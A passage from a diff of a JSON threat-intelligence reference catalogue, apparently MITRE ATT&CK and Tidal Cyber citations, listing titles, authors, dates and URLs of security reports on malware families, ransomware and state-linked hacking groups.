2018.", + "meta": { + "date_accessed": "2018-11-15T00:00:00Z", + "date_published": "2016-05-24T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + ], + "source": "MITRE", + "title": "New Wekby Attacks Use DNS Requests As Command and Control Mechanism" + }, + "related": [], + "uuid": "6f08aa4e-c89f-4d3e-8f46-e856e21d2d50", + "value": "PaloAlto DNS Requests May 2016" + }, + { + "description": "Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2016-05-24T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + ], + "source": "MITRE", + "title": "New Wekby Attacks Use DNS Requests As Command and Control Mechanism" + }, + "related": [], + "uuid": "4a946c3f-ee0a-4649-8104-2bd9d90ebd49", + "value": "Palo Alto DNS Requests" + }, + { + "description": "Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.", + "meta": { + "date_accessed": "2018-11-29T00:00:00Z", + "date_published": "2018-11-21T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/" + ], + "source": "MITRE", + "title": "New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit" + }, + "related": [], + "uuid": "44ceddf6-bcbf-4a60-bb92-f8cdc675d185", + "value": "Unit42 Azorult Nov 2018" + }, + { + "description": "Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2014-04-26T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" + ], + "source": "MITRE", + "title": "New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks" + }, + "related": [], + "uuid": "fd536975-ff27-45fc-a07f-4b2128568df8", + "value": "FireEye Clandestine Fox" + }, + { + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2018-10-25T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1055321868641689600" + ], + "source": "MITRE", + "title": "Nick Carr Status Update" + }, + "related": [], + "uuid": "12eea502-cf70-474f-8127-352cacc37418", + "value": "Twitter ItsReallyNick Platinum Masquerade" + }, + { + "description": "Carr, N.. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2017-12-26T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/945681177108762624" + ], + "source": "MITRE", + "title": "Nick Carr Status Update APT32 pubprn" + }, + "related": [], + "uuid": "731865ea-2410-40ac-85cf-75f768edd08a", + "value": "Twitter ItsReallyNick APT32 pubprn Masquerade" + }, + { + "description": "Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2019-10-30T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1189622925286084609" + ], + "source": "MITRE", + "title": "Nick Carr Status Update APT41 Environmental Keying" + }, + "related": [], + "uuid": "e226a034-b79b-42bd-8115-2537f98e5d46", + "value": "Twitter ItsReallyNick APT41 EK" + }, + { + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2018-10-25T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1055321652777619457" + ], + "source": "MITRE", + "title": "Nick Carr Status Update Masquerading" + }, + "related": [], + "uuid": "aca324b7-15f1-47b5-9c13-248d1b1a7fff", + "value": "Twitter ItsReallyNick Masquerading Update" + }, + { + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2021-09-29T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" + ], + "source": "MITRE", + "title": "NICKEL GLADSTONE Threat Profile" + }, + "related": [], + "uuid": "c78a8379-04a4-4558-820d-831ad4f267fd", + "value": "SecureWorks NICKEL GLADSTONE profile Sept 2021" + }, + { + "description": "MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.", + "meta": { + "date_accessed": "2022-03-18T00:00:00Z", + "date_published": "2021-12-06T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe" + ], + "source": "MITRE, Tidal Cyber", + "title": "NICKEL targeting government organizations across Latin America and Europe" + }, + "related": [], + "uuid": "29a46bb3-f514-4554-ad9c-35f9a5ad9870", + "value": "Microsoft NICKEL December 2021" + }, + { + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February) W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017", + "meta": { + "date_accessed": "2017-09-22T00:00:00Z", + "refs": [ + "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + ], + "source": "MITRE", + "title": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011" + }, + "related": [], + "uuid": "a1b371c2-b2b1-5780-95c8-11f8c616dcf3", + "value": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011" + }, + { + "description": "Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2016-08-25T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + ], + "source": "MITRE", + "title": "Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality" + }, + "related": [], + "uuid": "4cef8c44-d440-4746-b3e8-c8e4d307273d", + "value": "ProofPoint Ursnif Aug 2016" + }, + { + "description": "Scarfone, K. et al.. (2008, July). NIST Special Publication 800-123 - Guide to General Server Security. Retrieved July 26, 2018.", + "meta": { + "date_accessed": "2018-07-26T00:00:00Z", + "date_published": "2008-07-01T00:00:00Z", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf" + ], + "source": "MITRE", + "title": "NIST Special Publication 800-123 - Guide to General Server Security" + }, + "related": [], + "uuid": "351a444e-2829-4584-83ea-de909e43ee72", + "value": "NIST Server Security July 2008" + }, + { + "description": "Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.", + "meta": { + "date_accessed": "2021-09-30T00:00:00Z", + "date_published": "2016-10-14T00:00:00Z", + "refs": [ + "https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique" + ], + "source": "MITRE", + "title": "Nitol Botnet makes a resurgence with evasive sandbox analysis technique" + }, + "related": [], + "uuid": "94b5ac75-1fd5-4cad-a604-2b09846eb975", + "value": "Netskope Nitol" + }, + { + "description": "Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2013-08-30T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html" + ], + "source": "MITRE", + "title": "Njw0rm - Brother From the Same Mother" + }, + "related": [], + "uuid": "062c31b1-7c1e-487f-8340-11f4b3faabc4", + "value": "FireEye Njw0rm Aug 2013" + }, + { + "description": "ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "refs": [ + "https://ss64.com/nt/nltest.html" + ], + "source": "MITRE", + "title": "NLTEST.exe - Network Location Test" + }, + "related": [], + "uuid": "4bb113a8-7e2c-4656-86f4-c30b08705ffa", + "value": "Nltest Manual" + }, + { + "description": "Nmap. (n.d.). Nmap: the Network Mapper - Free Security Scanner. Retrieved September 7, 2023.", + "meta": { + "date_accessed": "2023-09-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://nmap.org/" + ], + "source": "Tidal Cyber", + "title": "Nmap: the Network Mapper - Free Security Scanner" + }, + "related": [], + "uuid": "65f1bbaa-8ad1-4ad5-b726-660558d27efc", + "value": "Nmap: the Network Mapper" + }, + { + "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2021-10-25T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/" + ], + "source": "MITRE", + "title": "NOBELIUM targeting delegated administrative privileges to facilitate broader attacks" + }, + "related": [], + "uuid": "7b6cc308-9871-47e5-9039-a9a7e66ce373", + "value": "MSTIC Nobelium Oct 2021" + }, + { + "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved January 31, 2022.", + "meta": { + "date_accessed": "2022-01-31T00:00:00Z", + "date_published": "2021-10-25T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks" + ], + "source": "MITRE", + "title": "NOBELIUM targeting delegated administrative privileges to facilitate broader attacks" + }, + "related": [], + "uuid": "aa315293-77a5-4ad9-b024-9af844edff9a", + "value": "Microsoft Nobelium Admin Privileges" + }, + { + "description": "Symantec Threat Hunter Team. (2022, September 22). Noberus Ransomware: Darkside and BlackMatter Successor Continues to Evolve its Tactics. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2022-09-22T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps" + ], + "source": "Tidal Cyber", + "title": "Noberus Ransomware: Darkside and BlackMatter Successor Continues to Evolve its Tactics" + }, + "related": [], + "uuid": "afd6808d-2c9f-4926-b7c6-ca9d3abdd923", + "value": "Symantec Noberus September 22 2022" + }, + { + "description": "Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.", + "meta": { + "date_accessed": "2022-01-14T00:00:00Z", + "date_published": "2021-12-16T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware" + ], + "source": "MITRE", + "title": "Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware" + }, + "related": [], + "uuid": "8206240f-c84e-442e-b025-f629e9cc8d91", + "value": "new_rust_based_ransomware" + }, + { + "description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.", + "meta": { + "date_accessed": "2021-08-04T00:00:00Z", + "date_published": "2021-06-01T00:00:00Z", + "refs": [ + "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/" + ], + "source": "MITRE", + "title": "NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks" + }, + "related": [], + "uuid": "98cf2bb0-f36c-45af-8d47-bf26aca3bb09", + "value": "SentinelOne NobleBaron June 2021" + }, + { + "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "refs": [ + "https://nodejs.org/" + ], + "source": "MITRE", + "title": "Node.js" + }, + "related": [], + "uuid": "af710d49-48f4-47f6-98c6-8d4a4568b020", + "value": "NodeJS" + }, + { + "description": "Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.", + "meta": { + "date_accessed": "2016-10-04T00:00:00Z", + "date_published": "2016-09-27T00:00:00Z", + "refs": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + ], + "source": "MITRE", + "title": "No Easy Breach DerbyCon 2016" + }, + "related": [], + "uuid": "e7c49ce6-9c5d-483a-b476-8a48799df6fa", + "value": "Mandiant No Easy Breach" + }, + { + "description": "Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.", + "meta": { + "date_accessed": "2020-08-24T00:00:00Z", + "date_published": "2020-05-21T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" + ], + "source": "MITRE", + "title": "No “Game over” for the Winnti Group" + }, + "related": [], + "uuid": "cbc09411-be18-4241-be69-b718a741ed8c", + "value": "ESET PipeMon May 2020" + }, + { + "description": "Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.", + "meta": { + "date_accessed": "2023-08-30T00:00:00Z", + "refs": [ + "https://linux.die.net/man/1/nohup" + ], + "source": "MITRE", + "title": "nohup(1)" + }, + "related": [], + "uuid": "f61dde91-3518-5a74-8eb8-bb3bae43e8fb", + "value": "nohup Linux Man" + }, + { + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2018-10-01T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "source": "MITRE", + "title": "NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT" + }, + "related": [], + "uuid": "4eea6638-a71b-4d74-acc4-0fac82ef72f6", + "value": "Unit 42 Nokki Oct 2018" + }, + { + "description": "Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "date_published": "2018-10-04T00:00:00Z", + "refs": [ + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Nomadic Octopus Cyber espionage in Central Asia" + }, + "related": [], + "uuid": "50dcb3f0-1461-453a-aab9-38c2e259173f", + "value": "ESET Nomadic Octopus 2018" + }, + { + "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.", + "meta": { + "date_accessed": "2020-05-21T00:00:00Z", + "date_published": "2016-04-11T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/" + ], + "source": "MITRE", + "title": "No money, but Pony! From a mail to a trojan horse" + }, + "related": [], + "uuid": "f8700002-5da6-4cb8-be62-34e421d2a573", + "value": "Malwarebytes Pony April 2016" + }, + { + "description": "Ruohonen, S. & Robinson, S. (2023, February 2). No Pineapple! -DPRK Targeting of Medical Research and Technology Sector. Retrieved July 10, 2023.", + "meta": { + "date_accessed": "2023-07-10T00:00:00Z", + "date_published": "2023-02-02T00:00:00Z", + "refs": [ + "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf" + ], + "source": "MITRE", + "title": "No Pineapple! -DPRK Targeting of Medical Research and Technology Sector" + }, + "related": [], + "uuid": "195922fa-a843-5cd3-a153-32f0b960dcb9", + "value": "WithSecure Lazarus-NoPineapple Threat Intel Report 2023" + }, + { + "description": "Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.", + "meta": { + "date_accessed": "2021-04-27T00:00:00Z", + "date_published": "2019-02-08T00:00:00Z", + "refs": [ + "https://www.xorrior.com/No-Place-Like-Chrome/" + ], + "source": "MITRE", + "title": "No Place Like Chrome" + }, + "related": [], + "uuid": "84bfd3a1-bda2-4821-ac52-6af8515e5879", + "value": "xorrior chrome extensions macOS" + }, + { + "description": "Stefanie Schappert. (2023, November 28). North American auto supplier Yanfeng claimed by Qilin ransom group. Retrieved November 30, 2023.", + "meta": { + "date_accessed": "2023-11-30T00:00:00Z", + "date_published": "2023-11-28T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://cybernews.com/news/yanfeng-ransomware-attack-claimed-qilin/" + ], + "source": "Tidal Cyber", + "title": "North American auto supplier Yanfeng claimed by Qilin ransom group" + }, + "related": [], + "uuid": "93c89ca5-1863-4ee2-9fff-258f94f655c4", + "value": "Cybernews Yanfeng Qilin November 2023" + }, + { + "description": "Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.", + "meta": { + "date_accessed": "2023-04-10T00:00:00Z", + "date_published": "2022-08-17T00:00:00Z", + "refs": [ + "https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html" + ], + "source": "MITRE", + "title": "North Korea Hackers Spotted Targeting Job Seekers with macOS Malware" + }, + "related": [], + "uuid": "8ae38830-1547-5cc1-83a4-87c3a7c82aa6", + "value": "The Hacker News Lazarus Aug 2022" + }, + { + "description": "Cimpanu, C. (2020, September 30). North Korea has tried to hack 11 officials of the UN Security Council. Retrieved November 4, 2020.", + "meta": { + "date_accessed": "2020-11-04T00:00:00Z", + "date_published": "2020-09-30T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/north-korea-has-tried-to-hack-11-officials-of-the-un-security-council/" + ], + "source": "MITRE", + "title": "North Korea has tried to hack 11 officials of the UN Security Council" + }, + "related": [], + "uuid": "6253bbc5-4d7d-4b7e-bd6b-59bd6366dc50", + "value": "Zdnet Kimsuky Group September 2020" + }, + { + "description": "Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.", + "meta": { + "date_accessed": "2021-09-30T00:00:00Z", + "date_published": "2021-08-17T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/" + ], + "source": "MITRE", + "title": "North Korean APT InkySquid Infects Victims Using Browser Exploits" + }, + "related": [], + "uuid": "7e394434-364f-4e50-9a96-3e75dacc9866", + "value": "Volexity InkySquid BLUELIGHT August 2021" + }, + { + "description": "An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.", + "meta": { + "date_accessed": "2021-12-29T00:00:00Z", + "date_published": "2021-11-10T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html" + ], + "source": "MITRE", + "title": "North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets" + }, + "related": [], + "uuid": "17927f0e-297a-45ec-8e1c-8a33892205dc", + "value": "Talos Kimsuky Nov 2021" + }, + { + "description": "Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "date_published": "2021-08-25T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" + ], + "source": "MITRE", + "title": "North Korean BLUELIGHT Special: InkySquid Deploys RokRAT" + }, + "related": [], + "uuid": "bff1667b-3f87-4653-bd17-b675e997baf1", + "value": "Volexity InkySquid RokRAT August 2021" + }, + { + "description": "Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.", + "meta": { + "date_accessed": "2022-01-27T00:00:00Z", + "date_published": "2022-01-27T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/" + ], + "source": "MITRE", + "title": "North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign" + }, + "related": [], + "uuid": "fbd96014-16c3-4ad6-bb3f-f92d15efce13", + "value": "Lazarus APT January 2022" + }, + { + "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.", + "meta": { + "date_accessed": "2021-08-23T00:00:00Z", + "date_published": "2019-12-17T00:00:00Z", + "refs": [ + "https://github.com/gtworek/PSBits/tree/master/NoRunDll" + ], + "source": "MITRE", + "title": "NoRunDll" + }, + "related": [], + "uuid": "72d4b682-ed19-4e0f-aeff-faa52b3a0439", + "value": "Github NoRunDll" + }, + { + "description": "Tim Parisi. (2022, December 22). Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2022-12-22T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/" + ], + "source": "Tidal Cyber", + "title": "Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies" + }, + "related": [], + "uuid": "e48760ba-2752-4d30-8f99-152c81f63017", + "value": "CrowdStrike Scattered Spider SIM Swapping December 22 2022" + }, + { + "description": "Parisi, T. (2022, December 2). Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies. Retrieved June 30, 2023.", + "meta": { + "date_accessed": "2023-06-30T00:00:00Z", + "date_published": "2022-12-02T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/" + ], + "source": "MITRE", + "title": "Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies" + }, + "related": [], + "uuid": "382785e1-4ef3-506e-b74f-cd07df9ae46e", + "value": "Crowdstrike TELCO BPO Campaign December 2022" + }, + { + "description": "Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020.", + "meta": { + "date_accessed": "2020-06-16T00:00:00Z", + "date_published": "2015-04-20T00:00:00Z", + "refs": [ + "https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/" + ], + "source": "MITRE", + "title": "Notes from SophosLabs: Dyreza, the malware that discriminates against old computers" + }, + "related": [], + "uuid": "50f9aa49-dde5-42c9-ba5c-f42281a71b7e", + "value": "Sophos Dyreza April 2015" + }, + { + "description": "Boyens, J,. Et al.. (2002, October). Notional Supply Chain Risk Management Practices for Federal Information Systems. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2002-10-01T00:00:00Z", + "refs": [ + "http://dx.doi.org/10.6028/NIST.IR.7622" + ], + "source": "MITRE", + "title": "Notional Supply Chain Risk Management Practices for Federal Information Systems" + }, + "related": [], + "uuid": "b3171abc-957c-4bd5-a18f-0d66bba396b9", + "value": "NIST Supply Chain 2012" + }, + { + "description": "eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc.. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2021-07-21T00:00:00Z", + "refs": [ + "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc" + ], + "source": "MITRE", + "title": "Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc." + }, + "related": [], + "uuid": "3976dd0e-7dee-4ae7-8c38-484b12ca233e", + "value": "eSentire FIN7 July 2021" + }, + { + "description": "Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.", + "meta": { + "date_accessed": "2020-06-11T00:00:00Z", + "date_published": "2017-06-28T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack" + ], + "source": "MITRE", + "title": "NotPetya Campaign: What We Know About the Latest Global Ransomware Attack" + }, + "related": [], + "uuid": "3109e59c-ace2-4e5a-bba2-24b840a7af0d", + "value": "Secureworks NotPetya June 2017" + }, + { + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "meta": { + "date_accessed": "2019-02-04T00:00:00Z", + "date_published": "2017-09-21T00:00:00Z", + "refs": [ + "https://github.com/sensepost/notruler" + ], + "source": "MITRE", + "title": "NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange" + }, + "related": [], + "uuid": "1bafe35e-f99c-4aa9-8b2f-5a35970ec83b", + "value": "SensePost NotRuler" + }, + { + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", + "meta": { + "date_accessed": "2018-11-27T00:00:00Z", + "date_published": "2018-11-19T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + ], + "source": "MITRE", + "title": "Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign" + }, + "related": [], + "uuid": "30e769e0-4552-429b-b16e-27830d42edea", + "value": "FireEye APT29 Nov 2018" + }, + { + "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "refs": [ + "https://undocumented.ntinternals.net/" + ], + "source": "MITRE", + "title": "Nowak, T" + }, + "related": [], + "uuid": "306f7da7-caa2-40bf-a3db-e579c541eeb4", + "value": "NT API Windows" + }, + { + "description": "Npcap. (n.d.). Npcap: Windows Packet Capture Library & Driver. Retrieved September 7, 2023.", + "meta": { + "date_accessed": "2023-09-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://npcap.com/" + ], + "source": "Tidal Cyber", + "title": "Npcap: Windows Packet Capture Library & Driver" + }, + "related": [], + "uuid": "c8dc5650-eb37-4bb6-b5b7-e6269c79785c", + "value": "Npcap: Windows Packet Capture Library & Driver" + }, + { + "description": "Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2021-10-21T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" + ], + "source": "MITRE", + "title": "NPLogonNotify function (npapi.h)" + }, + "related": [], + "uuid": "1fda833e-e543-5e68-a0f5-8a4170dd632a", + "value": "NPLogonNotify" + }, + { + "description": "Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2021-12-15T00:00:00Z", + "refs": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy" + ], + "source": "MITRE", + "title": "NPPSpy" + }, + "related": [], + "uuid": "c12bfaf6-4d83-552e-912b-cc55bce85961", + "value": "NPPSPY" + }, + { + "description": "LOLBAS. (2020, January 10). ntdsutil.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-01-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntdsutil/" + ], + "source": "Tidal Cyber", + "title": "ntdsutil.exe" + }, + "related": [], + "uuid": "9d15ab80-86b7-4a69-ae3f-de017ca89f37", + "value": "ntdsutil.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2016, August 31). Ntdsutil Microsoft. Retrieved July 11, 2023.", + "meta": { + "date_accessed": "2023-07-11T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)" + ], + "source": "Tidal Cyber", + "title": "Ntdsutil Microsoft" + }, + "related": [], + "uuid": "34de2f08-0481-4894-80ef-86506d821cf0", + "value": "Ntdsutil Microsoft" + }, + { + "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.", + "meta": { + "date_accessed": "2018-03-21T00:00:00Z", + "date_published": "2010-08-25T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/" + ], + "source": "MITRE", + "title": "NTFS File Attributes" + }, + "related": [], + "uuid": "dc4689d2-54b4-4310-ac10-6b234eedbc16", + 